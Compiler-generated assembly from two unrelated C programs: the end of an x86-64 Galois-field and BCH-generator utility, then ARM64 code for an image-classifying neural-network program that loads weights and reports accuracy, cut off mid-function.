## %bb.3: ## in Loop: Header=BB17_1 Depth=1
movq _gf_exp(%rip), %rax
movzwl -16(%rbp), %ecx
## kill: def $rcx killed $ecx
movzwl (%rax,%rcx,2), %ecx
movzwl -14(%rbp), %eax
xorl %ecx, %eax
## kill: def $ax killed $ax killed $eax
movw %ax, -14(%rbp)
LBB17_4: ## in Loop: Header=BB17_1 Depth=1
movq -8(%rbp), %rax
shrq $1, %rax
movq %rax, -8(%rbp)
movzwl -16(%rbp), %eax
movzwl -12(%rbp), %ecx
addl %ecx, %eax
## kill: def $ax killed $ax killed $eax
movzwl %ax, %edi
callq _mod_s
movw %ax, -16(%rbp)
jmp LBB17_1
LBB17_5:
movzwl -14(%rbp), %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function mod_s
_mod_s: ## @mod_s
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movw %di, %ax
movw %ax, -2(%rbp)
movzwl -2(%rbp), %eax
movzwl _gf_order(%rip), %ecx
cmpl %ecx, %eax
jl LBB18_2
## %bb.1:
movzwl -2(%rbp), %eax
movzwl _gf_order(%rip), %ecx
subl %ecx, %eax
movl %eax, -8(%rbp) ## 4-byte Spill
jmp LBB18_3
LBB18_2:
movzwl -2(%rbp), %eax
movl %eax, -8(%rbp) ## 4-byte Spill
LBB18_3:
movl -8(%rbp), %eax ## 4-byte Reload
## kill: def $ax killed $ax killed $eax
movzwl %ax, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "search"
L_.str.1: ## @.str.1
.asciz "exp"
.zerofill __DATA,__bss,_gf_exp,8,3 ## @gf_exp
L_.str.2: ## @.str.2
.asciz "log"
.zerofill __DATA,__bss,_gf_log,8,3 ## @gf_log
L_.str.3: ## @.str.3
.asciz "bch"
L_.str.4: ## @.str.4
.asciz "unknown operation: %s\n"
L_.str.5: ## @.str.5
.asciz "usage:\n %s search <degree>\n Search for primitive polynomials.\n %s <generator> exp\n Print GF(2^m) exponential table.\n %s <generator> log\n Print GF(2^m) logarithm table.\n %s <generator> bch <syndrome count>\n Find roots and product BCH generator.\n"
L_.str.6: ## @.str.6
.asciz "\n"
L_.str.7: ## @.str.7
.asciz "0x%lx [0x%lx] -> "
L_.str.8: ## @.str.8
.asciz " + "
L_.str.9: ## @.str.9
.asciz "1"
L_.str.10: ## @.str.10
.asciz "%c"
L_.str.11: ## @.str.11
.asciz "%c^%d"
L_.str.12: ## @.str.12
.asciz "parse_poly: invalid character: %s\n"
L_.str.13: ## @.str.13
.asciz "gf_init: generator degree out of bounds\n"
.zerofill __DATA,__bss,_gf_order,2,1 ## @gf_order
.zerofill __DATA,__bss,_gf_degree,2,1 ## @gf_degree
L_.str.14: ## @.str.14
.asciz "gf_init: malloc"
L_.str.15: ## @.str.15
.asciz "0x%%0%dx,"
L_.str.16: ## @.str.16
.asciz " "
L_.str.17: ## @.str.17
.asciz "bch_generator: syndrome count out of bounds\n"
L_.str.18: ## @.str.18
.asciz "bch_generator: malloc"
L_.str.19: ## @.str.19
.asciz "BCH generator, %d roots:\n"
L_.str.20: ## @.str.20
.asciz " min(alpha^%d): "
L_.str.21: ## @.str.21
.asciz "bch_generator: overflow\n"
L_.str.22: ## @.str.22
.asciz " [dup]\n"
L_.str.23: ## @.str.23
.asciz " generator: "
.subsections_via_symbols
| the_stack_data/16162.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
mov w8, #0
str w8, [sp, #12] ; 4-byte Folded Spill
stur wzr, [x29, #-4]
stur w0, [x29, #-8]
str x1, [sp, #16]
ldur w0, [x29, #-8]
ldr x1, [sp, #16]
bl _Interface
ldr w0, [sp, #12] ; 4-byte Folded Reload
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.section __TEXT,__literal8,8byte_literals
.p2align 3 ; -- Begin function Interface
lCPI1_0:
.quad 0x4059000000000000 ; double 100
.section __TEXT,__text,regular,pure_instructions
.globl _Interface
.p2align 2
_Interface: ; @Interface
.cfi_startproc
; %bb.0:
sub sp, sp, #224
.cfi_def_cfa_offset 224
stp x29, x30, [sp, #208] ; 16-byte Folded Spill
add x29, sp, #208
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stdinp@GOTPAGE
ldr x8, [x8, ___stdinp@GOTPAGEOFF]
str x8, [sp, #72] ; 8-byte Folded Spill
stur w0, [x29, #-4]
stur x1, [x29, #-16]
; kill: def $x8 killed $xzr
stur xzr, [x29, #-24]
stur xzr, [x29, #-32]
ldur w8, [x29, #-4]
subs w8, w8, #4
cset w8, ne
tbnz w8, #0, LBB1_13
b LBB1_1
LBB1_1:
ldur x8, [x29, #-16]
ldr x0, [x8, #8]
adrp x1, l_.str.9@PAGE
add x1, x1, l_.str.9@PAGEOFF
bl _strcmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB1_13
b LBB1_2
LBB1_2:
ldur x8, [x29, #-16]
ldr x0, [x8, #16]
adrp x1, l_.str.10@PAGE
add x1, x1, l_.str.10@PAGEOFF
bl _strcmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB1_6
b LBB1_3
LBB1_3:
ldur x8, [x29, #-16]
ldr x0, [x8, #24]
adrp x1, l_.str.11@PAGE
add x1, x1, l_.str.11@PAGEOFF
bl _fopen
stur x0, [x29, #-24]
ldur x8, [x29, #-24]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB1_5
b LBB1_4
LBB1_4:
ldur x8, [x29, #-16]
ldr x8, [x8, #24]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.12@PAGE
add x0, x0, l_.str.12@PAGEOFF
bl _printf
mov w0, #1
bl _exit
LBB1_5:
b LBB1_12
LBB1_6:
ldur x8, [x29, #-16]
ldr x0, [x8, #16]
adrp x1, l_.str.13@PAGE
add x1, x1, l_.str.13@PAGEOFF
bl _strcmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB1_10
b LBB1_7
LBB1_7:
ldur x8, [x29, #-16]
ldr x0, [x8, #24]
adrp x1, l_.str.11@PAGE
add x1, x1, l_.str.11@PAGEOFF
bl _fopen
stur x0, [x29, #-24]
ldur x8, [x29, #-24]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB1_9
b LBB1_8
LBB1_8:
ldur x8, [x29, #-16]
ldr x8, [x8, #24]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.12@PAGE
add x0, x0, l_.str.12@PAGEOFF
bl _printf
mov w0, #1
bl _exit
LBB1_9:
b LBB1_11
LBB1_10:
ldur x8, [x29, #-16]
ldr x8, [x8, #16]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.24@PAGE
add x0, x0, l_.str.24@PAGEOFF
bl _printf
mov w0, #1
bl _exit
LBB1_11:
b LBB1_12
LBB1_12:
b LBB1_14
LBB1_13:
adrp x0, l_.str.15@PAGE
add x0, x0, l_.str.15@PAGEOFF
bl _printf
mov w0, #1
bl _exit
LBB1_14:
bl _initNetwork
stur x0, [x29, #-40]
bl _initListe
stur x0, [x29, #-48]
ldur x8, [x29, #-16]
ldr x0, [x8, #16]
adrp x1, l_.str.10@PAGE
add x1, x1, l_.str.10@PAGEOFF
bl _strcmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB1_16
b LBB1_15
LBB1_15:
ldur x8, [x29, #-16]
ldr x8, [x8, #24]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.25@PAGE
add x0, x0, l_.str.25@PAGEOFF
bl _printf
ldur x0, [x29, #-40]
ldur x1, [x29, #-24]
bl _loadNetwork
ldur x0, [x29, #-40]
adrp x1, l_.str.26@PAGE
add x1, x1, l_.str.26@PAGEOFF
bl _VerificationReseau
adrp x0, l_.str.27@PAGE
add x0, x0, l_.str.27@PAGEOFF
str x0, [sp, #64] ; 8-byte Folded Spill
bl _printf
bl _avancerGetchar
bl _InterLoadImage
stur x0, [x29, #-32]
adrp x0, l_.str.28@PAGE
add x0, x0, l_.str.28@PAGEOFF
bl _printf
ldur x0, [x29, #-32]
ldur x1, [x29, #-48]
bl _loadImg
ldr x0, [sp, #64] ; 8-byte Folded Reload
bl _printf
b LBB1_19
LBB1_16:
ldur x8, [x29, #-16]
ldr x0, [x8, #16]
adrp x1, l_.str.13@PAGE
add x1, x1, l_.str.13@PAGEOFF
bl _strcmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB1_18
b LBB1_17
LBB1_17:
ldur x8, [x29, #-16]
ldr x8, [x8, #24]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.25@PAGE
add x0, x0, l_.str.25@PAGEOFF
bl _printf
ldur x0, [x29, #-24]
ldur x1, [x29, #-48]
bl _loadImg
ldur x8, [x29, #-16]
ldr x8, [x8, #24]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.29@PAGE
add x0, x0, l_.str.29@PAGEOFF
bl _printf
bl _avancerGetchar
bl _InterLoadNetwork
stur x0, [x29, #-32]
adrp x0, l_.str.30@PAGE
add x0, x0, l_.str.30@PAGEOFF
bl _printf
ldur x0, [x29, #-40]
ldur x1, [x29, #-32]
bl _loadNetwork
adrp x0, l_.str.27@PAGE
add x0, x0, l_.str.27@PAGEOFF
bl _printf
b LBB1_18
LBB1_18:
b LBB1_19
LBB1_19:
adrp x0, l_.str.31@PAGE
add x0, x0, l_.str.31@PAGEOFF
bl _printf
mov x0, #80
bl _malloc
stur x0, [x29, #-56]
; kill: def $x8 killed $xzr
stur xzr, [x29, #-64]
movi d0, #0000000000000000
stur d0, [x29, #-72]
stur d0, [x29, #-80]
stur wzr, [x29, #-84]
stur wzr, [x29, #-88]
mov x0, #6
mov x1, #1
bl _calloc
stur x0, [x29, #-96]
stur wzr, [x29, #-100]
mov x0, #1024
str x0, [sp, #56] ; 8-byte Folded Spill
bl _malloc
mov x8, x0
ldr x0, [sp, #56] ; 8-byte Folded Reload
str x8, [sp, #96]
bl _malloc
str x0, [sp, #88]
ldur x8, [x29, #-48]
ldr x8, [x8, #8]
str x8, [sp, #80]
adrp x0, l_.str.32@PAGE
add x0, x0, l_.str.32@PAGEOFF
bl _printf
adrp x0, l_.str.33@PAGE
add x0, x0, l_.str.33@PAGEOFF
bl _printf
b LBB1_20
LBB1_20: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #80]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB1_29
b LBB1_21
LBB1_21: ; in Loop: Header=BB1_20 Depth=1
bl _getchar
ldur x0, [x29, #-96]
adrp x1, l_.str.34@PAGE
add x1, x1, l_.str.34@PAGEOFF
mov x2, #-1
bl ___strcpy_chk
ldr x8, [sp, #80]
ldr x0, [x8, #16]
ldr x8, [sp, #80]
ldr w1, [x8, #24]
bl _imgNormalisation
stur x0, [x29, #-64]
ldur x0, [x29, #-40]
ldur x1, [x29, #-64]
bl _evalNetwork
stur x0, [x29, #-56]
ldur w8, [x29, #-88]
add w8, w8, #1
stur w8, [x29, #-88]
ldur w9, [x29, #-88]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.35@PAGE
add x0, x0, l_.str.35@PAGEOFF
bl _printf
ldur x0, [x29, #-56]
bl _imgClass
mov x9, sp
; implicit-def: $x8
mov x8, x0
str x8, [x9]
adrp x0, l_.str.36@PAGE
add x0, x0, l_.str.36@PAGEOFF
bl _printf
ldr x8, [sp, #80]
ldr w9, [x8, #12]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.37@PAGE
add x0, x0, l_.str.37@PAGEOFF
bl _printf
ldr x8, [sp, #80]
ldr w8, [x8, #12]
str w8, [sp, #52] ; 4-byte Folded Spill
ldur x0, [x29, #-56]
bl _imgClass
ldr w8, [sp, #52] ; 4-byte Folded Reload
subs w8, w8, w0
cset w8, ne
tbnz w8, #0, LBB1_23
b LBB1_22
LBB1_22: ; in Loop: Header=BB1_20 Depth=1
ldur w8, [x29, #-84]
add w8, w8, #1
stur w8, [x29, #-84]
ldur x0, [x29, #-96]
adrp x1, l_.str.38@PAGE
add x1, x1, l_.str.38@PAGEOFF
mov x2, #-1
bl ___strcpy_chk
b LBB1_23
LBB1_23: ; in Loop: Header=BB1_20 Depth=1
ldur x8, [x29, #-96]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.39@PAGE
add x0, x0, l_.str.39@PAGEOFF
bl _printf
ldur s1, [x29, #-84]
; implicit-def: $d0
fmov s0, s1
sshll.2d v0, v0, #0
; kill: def $d0 killed $d0 killed $q0
scvtf d0, d0
ldur s2, [x29, #-88]
; implicit-def: $d1
fmov s1, s2
sshll.2d v1, v1, #0
; kill: def $d1 killed $d1 killed $q1
scvtf d1, d1
fdiv d0, d0, d1
adrp x8, lCPI1_0@PAGE
ldr d1, [x8, lCPI1_0@PAGEOFF]
str d1, [sp, #32] ; 8-byte Folded Spill
fmul d0, d0, d1
stur d0, [x29, #-72]
ldur d0, [x29, #-72]
mov x8, sp
str d0, [x8]
adrp x0, l_.str.40@PAGE
add x0, x0, l_.str.40@PAGEOFF
bl _printf
ldr d0, [sp, #32] ; 8-byte Folded Reload
ldur d1, [x29, #-72]
fsub d0, d0, d1
stur d0, [x29, #-80]
ldur d0, [x29, #-80]
mov x8, sp
str d0, [x8]
adrp x0, l_.str.41@PAGE
add x0, x0, l_.str.41@PAGEOFF
bl _printf
ldur w9, [x29, #-84]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.42@PAGE
add x0, x0, l_.str.42@PAGEOFF
str x0, [sp, #40] ; 8-byte Folded Spill
bl _printf
ldr x0, [sp, #40] ; 8-byte Folded Reload
ldur w8, [x29, #-88]
ldur w9, [x29, #-84]
subs w10, w8, w9
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
bl _printf
ldr x8, [sp, #80]
ldr x8, [x8, #32]
str x8, [sp, #80]
ldur w8, [x29, #-100]
add w8, w8, #1
stur w8, [x29, #-100]
ldur w8, [x29, #-100]
subs w8, w8, #100
cset w8, ne
tbnz w8, #0, LBB1_28
b LBB1_24
LBB1_24: ; in Loop: Header=BB1_20 Depth=1
adrp x0, l_.str.43@PAGE
add x0, x0, l_.str.43@PAGEOFF
bl _printf
ldr x8, [sp, #72] ; 8-byte Folded Reload
ldr x0, [x8]
bl _rewind
ldr x8, [sp, #72] ; 8-byte Folded Reload
ldr x0, [sp, #88]
ldr x2, [x8]
mov w1, #1024
bl _fgets
ldr x8, [sp, #72] ; 8-byte Folded Reload
ldr x0, [x8]
bl _rewind
ldr x0, [sp, #88]
bl _InterfaceControleChaine
str x0, [sp, #96]
ldr x0, [sp, #96]
bl _toUpper
ldr x0, [sp, #96]
adrp x1, l_.str.44@PAGE
add x1, x1, l_.str.44@PAGEOFF
bl _strcmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB1_26
b LBB1_25
LBB1_25: ; in Loop: Header=BB1_20 Depth=1
stur wzr, [x29, #-100]
b LBB1_27
LBB1_26:
b LBB1_29
LBB1_27: ; in Loop: Header=BB1_20 Depth=1
b LBB1_28
LBB1_28: ; in Loop: Header=BB1_20 Depth=1
b LBB1_20
LBB1_29:
b LBB1_30
LBB1_30: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #80]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB1_34
b LBB1_31
LBB1_31: ; in Loop: Header=BB1_30 Depth=1
ldur x0, [x29, #-96]
adrp x1, l_.str.34@PAGE
add x1, x1, l_.str.34@PAGEOFF
mov x2, #-1
bl ___strcpy_chk
ldr x8, [sp, #80]
ldr x0, [x8, #16]
ldr x8, [sp, #80]
ldr w1, [x8, #24]
bl _imgNormalisation
stur x0, [x29, #-64]
ldur x0, [x29, #-40]
ldur x1, [x29, #-64]
bl _evalNetwork
stur x0, [x29, #-56]
ldur w8, [x29, #-88]
add w8, w8, #1
stur w8, [x29, #-88]
ldur w9, [x29, #-88]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.35@PAGE
add x0, x0, l_.str.35@PAGEOFF
bl _printf
ldur x0, [x29, #-56]
bl _imgClass
mov x9, sp
; implicit-def: $x8
mov x8, x0
str x8, [x9]
adrp x0, l_.str.36@PAGE
add x0, x0, l_.str.36@PAGEOFF
bl _printf
ldr x8, [sp, #80]
ldr w9, [x8, #12]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.37@PAGE
add x0, x0, l_.str.37@PAGEOFF
bl _printf
ldr x8, [sp, #80]
ldr w8, [x8, #12]
str w8, [sp, #28] ; 4-byte Folded Spill
ldur x0, [x29, #-56]
bl _imgClass
ldr w8, [sp, #28] ; 4-byte Folded Reload
subs w8, w8, w0
cset w8, ne
tbnz w8, #0, LBB1_33
b LBB1_32
LBB1_32: ; in Loop: Header=BB1_30 Depth=1
ldur w8, [x29, #-84]
add w8, w8, #1
stur w8, [x29, #-84]
ldur x0, [x29, #-96]
adrp x1, l_.str.38@PAGE
add x1, x1, l_.str.38@PAGEOFF
mov x2, #-1
bl ___strcpy_chk
b LBB1_33
LBB1_33: ; in Loop: Header=BB1_30 Depth=1
ldur x8, [x29, #-96]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.39@PAGE
add x0, x0, l_.str.39@PAGEOFF
bl _printf
ldur s1, [x29, #-84]
; implicit-def: $d0
fmov s0, s1
sshll.2d v0, v0, #0
; kill: def $d0 killed $d0 killed $q0
scvtf d0, d0
ldur s2, [x29, #-88]
; implicit-def: $d1
fmov s1, s2
sshll.2d v1, v1, #0
; kill: def $d1 killed $d1 killed $q1
scvtf d1, d1
fdiv d0, d0, d1
adrp x8, lCPI1_0@PAGE
ldr d1, [x8, lCPI1_0@PAGEOFF]
str d1, [sp, #8] ; 8-byte Folded Spill
fmul d0, d0, d1
stur d0, [x29, #-72]
ldur d0, [x29, #-72]
mov x8, sp
str d0, [x8]
adrp x0, l_.str.40@PAGE
add x0, x0, l_.str.40@PAGEOFF
bl _printf
ldr d0, [sp, #8] ; 8-byte Folded Reload
ldur d1, [x29, #-72]
fsub d0, d0, d1
stur d0, [x29, #-80]
ldur d0, [x29, #-80]
mov x8, sp
str d0, [x8]
adrp x0, l_.str.41@PAGE
add x0, x0, l_.str.41@PAGEOFF
bl _printf
ldur w9, [x29, #-84]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.42@PAGE
add x0, x0, l_.str.42@PAGEOFF
str x0, [sp, #16] ; 8-byte Folded Spill
bl _printf
ldr x0, [sp, #16] ; 8-byte Folded Reload
ldur w8, [x29, #-88]
ldur w9, [x29, #-84]
subs w10, w8, w9
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
bl _printf
ldr x8, [sp, #80]
ldr x8, [x8, #32]
str x8, [sp, #80]
b LBB1_30
LBB1_34:
adrp x0, l_.str.45@PAGE
add x0, x0, l_.str.45@PAGEOFF
bl _printf
ldur w9, [x29, #-88]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.46@PAGE
add x0, x0, l_.str.46@PAGEOFF
bl _printf
ldur d0, [x29, #-80]
mov x8, sp
str d0, [x8]
adrp x0, l_.str.47@PAGE
add x0, x0, l_.str.47@PAGEOFF
bl _printf
ldur d0, [x29, #-72]
mov x8, sp
str d0, [x8]
adrp x0, l_.str.48@PAGE
add x0, x0, l_.str.48@PAGEOFF
bl _printf
ldur w9, [x29, #-84]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.49@PAGE
add x0, x0, l_.str.49@PAGEOFF
bl _printf
ldur w8, [x29, #-88]
ldur w9, [x29, #-84]
subs w10, w8, w9
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x0, l_.str.50@PAGE
add x0, x0, l_.str.50@PAGEOFF
bl _printf
adrp x0, l_.str.51@PAGE
add x0, x0, l_.str.51@PAGEOFF
bl _printf
adrp x0, l_.str.52@PAGE
add x0, x0, l_.str.52@PAGEOFF
bl _printf
ldr x8, [sp, #72] ; 8-byte Folded Reload
ldr x0, [x8]
bl _rewind
ldr x8, [sp, #72] ; 8-byte Folded Reload
ldr x0, [sp, #88]
ldr x2, [x8]
mov w1, #1024
bl _fgets
ldr x8, [sp, #72] ; 8-byte Folded Reload
ldr x0, [x8]
bl _rewind
ldr x0, [sp, #88]
bl _InterfaceControleChaine
str x0, [sp, #96]
ldr x0, [sp, #96]
bl _toUpper
ldr x0, [sp, #96]
adrp x1, l_.str.44@PAGE
add x1, x1, l_.str.44@PAGEOFF
bl _strcmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB1_36
b LBB1_35
LBB1_35:
bl _InfosStatistiques
b LBB1_36
LBB1_36:
ldp x29, x30, [sp, #208] ; 16-byte Folded Reload
add sp, sp, #224
ret
.cfi_endproc
; -- End function
.globl _initNetwork ; -- Begin function initNetwork
.p2align 2
_initNetwork: ; @initNetwork
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
mov x0, #24
bl _malloc
str x0, [sp, #8]
ldr x8, [sp, #8]
str wzr, [x8]
ldr x8, [sp, #8]
; kill: def $x9 killed $xzr
str xzr, [x8, #8]
ldr x8, [sp, #8]
str xzr, [x8, #16]
ldr x0, [sp, #8]
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _loadNetwork ; -- Begin function loadNetwork
.p2align 2
_loadNetwork: ; @loadNetwork
.cfi_startproc
; %bb.0:
sub sp, sp, #144
.cfi_def_cfa_offset 144
stp x29, x30, [sp, #128] ; 16-byte Folded Spill
add x29, sp, #128
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur x1, [x29, #-16]
ldur x8, [x29, #-16]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB3_2
b LBB3_1
LBB3_1:
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x1, [x8]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _fputs
mov w0, #1
bl _exit
LBB3_2:
ldur x0, [x29, #-16]
mov x1, #0
mov w2, #2
bl _fseek
ldur x0, [x29, #-16]
bl _ftell
stur x0, [x29, #-24]
ldur x0, [x29, #-16]
bl _rewind
ldur x9, [x29, #-24]
mov x8, #1
str x8, [sp, #40] ; 8-byte Folded Spill
mul x0, x8, x9
bl _malloc
ldr x1, [sp, #40] ; 8-byte Folded Reload
stur x0, [x29, #-32]
ldur x0, [x29, #-32]
ldur x2, [x29, #-24]
ldur x3, [x29, #-16]
bl _fread
stur x0, [x29, #-40]
ldur x8, [x29, #-40]
ldur x9, [x29, #-24]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB3_4
b LBB3_3
LBB3_3:
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x1, [x8]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _fputs
mov w0, #1
bl _exit
LBB3_4:
stur wzr, [x29, #-44]
stur wzr, [x29, #-48]
b LBB3_5
LBB3_5: ; =>This Inner Loop Header: Depth=1
ldur x8, [x29, #-32]
ldursw x9, [x29, #-48]
add x8, x8, x9
ldrb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB3_10
b LBB3_6
LBB3_6: ; in Loop: Header=BB3_5 Depth=1
ldur x8, [x29, #-32]
ldursw x9, [x29, #-48]
ldrsb w8, [x8, x9]
subs w8, w8, #10
cset w8, ne
tbnz w8, #0, LBB3_8
b LBB3_7
LBB3_7: ; in Loop: Header=BB3_5 Depth=1
ldur w8, [x29, #-44]
add w8, w8, #1
stur w8, [x29, #-44]
b LBB3_8
LBB3_8: ; in Loop: Header=BB3_5 Depth=1
b LBB3_9
LBB3_9: ; in Loop: Header=BB3_5 Depth=1
ldur w8, [x29, #-48]
add w8, w8, #1
stur w8, [x29, #-48]
b LBB3_5
LBB3_10:
adrp x8, l_.str.2@PAGE
add x8, x8, l_.str.2@PAGEOFF
stur x8, [x29, #-56]
ldur x0, [x29, #-32]
ldur x1, [x29, #-56]
bl _strtok
str x0, [sp, #64]
b LBB3_11
LBB3_11: ; =>This Loop Header: Depth=1
; Child Loop BB3_15 Depth 2
; Child Loop BB3_19 Depth 2
; Child Loop BB3_21 Depth 3
ldr x8, [sp, #64]
subs x8, x8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #36] ; 4-byte Folded Spill
tbnz w8, #0, LBB3_13
b LBB3_12
LBB3_12: ; in Loop: Header=BB3_11 Depth=1
ldur w8, [x29, #-44]
subs w8, w8, #0
cset w8, gt
str w8, [sp, #36] ; 4-byte Folded Spill
b LBB3_13
LBB3_13: ; in Loop: Header=BB3_11 Depth=1
ldr w8, [sp, #36] ; 4-byte Folded Reload
tbz w8, #0, LBB3_27
b LBB3_14
LBB3_14: ; in Loop: Header=BB3_11 Depth=1
ldur w8, [x29, #-44]
subs w8, w8, #1
stur w8, [x29, #-44]
str wzr, [sp, #60]
str wzr, [sp, #56]
mov x0, #32
bl _malloc
str x0, [sp, #48]
ldr x0, [sp, #64]
bl _atoi
ldr x8, [sp, #48]
str w0, [x8, #16]
ldur x1, [x29, #-56]
mov x0, #0
bl _strtok
str x0, [sp, #64]
ldr x0, [sp, #64]
bl _atoi
ldr x8, [sp, #48]
str w0, [x8, #20]
ldr x8, [sp, #48]
ldrsw x0, [x8, #16]
mov x1, #8
str x1, [sp, #24] ; 8-byte Folded Spill
bl _calloc
ldr x1, [sp, #24] ; 8-byte Folded Reload
ldr x8, [sp, #48]
str x0, [x8]
ldr x8, [sp, #48]
ldrsw x0, [x8, #20]
bl _calloc
ldr x8, [sp, #48]
str x0, [x8, #8]
ldr x8, [sp, #48]
ldrsw x0, [x8, #20]
mov x1, #48
bl _calloc
ldr x8, [sp, #48]
str x0, [x8, #24]
str wzr, [sp, #56]
b LBB3_15
LBB3_15: ; Parent Loop BB3_11 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #56]
ldr x9, [sp, #48]
ldr w9, [x9, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB3_18
b LBB3_16
LBB3_16: ; in Loop: Header=BB3_15 Depth=2
ldr x8, [sp, #48]
ldrsw x0, [x8, #16]
mov x1, #8
str x1, [sp, #8] ; 8-byte Folded Spill
bl _calloc
ldr x1, [sp, #8] ; 8-byte Folded Reload
ldr x8, [sp, #48]
ldr x8, [x8, #24]
ldrsw x9, [sp, #56]
mov x10, #48
str x10, [sp, #16] ; 8-byte Folded Spill
mul x9, x9, x10
add x8, x8, x9
str x0, [x8, #16]
ldr x8, [sp, #48]
ldrsw x0, [x8, #16]
bl _calloc
ldr x10, [sp, #16] ; 8-byte Folded Reload
ldr x8, [sp, #48]
ldr x8, [x8, #24]
ldrsw x9, [sp, #56]
mul x9, x9, x10
add x8, x8, x9
str x0, [x8, #40]
b LBB3_17
LBB3_17: ; in Loop: Header=BB3_15 Depth=2
ldr w8, [sp, #56]
add w8, w8, #1
str w8, [sp, #56]
b LBB3_15
LBB3_18: ; in Loop: Header=BB3_11 Depth=1
str wzr, [sp, #56]
b LBB3_19
LBB3_19: ; Parent Loop BB3_11 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB3_21 Depth 3
ldr w8, [sp, #56]
ldr x9, [sp, #48]
ldr w9, [x9, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB3_26
b LBB3_20
LBB3_20: ; in Loop: Header=BB3_19 Depth=2
ldur w8, [x29, #-44]
subs w8, w8, #1
stur w8, [x29, #-44]
ldur x1, [x29, #-56]
mov x0, #0
bl _strtok
str x0, [sp, #64]
ldr x0, [sp, #64]
bl _atof
ldr x8, [sp, #48]
ldr x8, [x8, #24]
ldrsw x9, [sp, #56]
mov x11, #48
mul x9, x9, x11
add x8, x8, x9
str d0, [x8, #8]
ldr x8, [sp, #48]
ldr w8, [x8, #16]
ldr x9, [sp, #48]
ldr x9, [x9, #24]
ldrsw x10, [sp, #56]
mul x10, x10, x11
str w8, [x9, x10]
str wzr, [sp, #60]
b LBB3_21
LBB3_21: ; Parent Loop BB3_11 Depth=1
; Parent Loop BB3_19 Depth=2
; => This Inner Loop Header: Depth=3
ldr w8, [sp, #60]
ldr x9, [sp, #48]
ldr w9, [x9, #16]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB3_24
b LBB3_22
LBB3_22: ; in Loop: Header=BB3_21 Depth=3
ldur x1, [x29, #-56]
mov x0, #0
bl _strtok
str x0, [sp, #64]
ldr x0, [sp, #64]
bl _atof
ldr x8, [sp, #48]
ldr x8, [x8, #24]
ldrsw x9, [sp, #56]
mov x10, #48
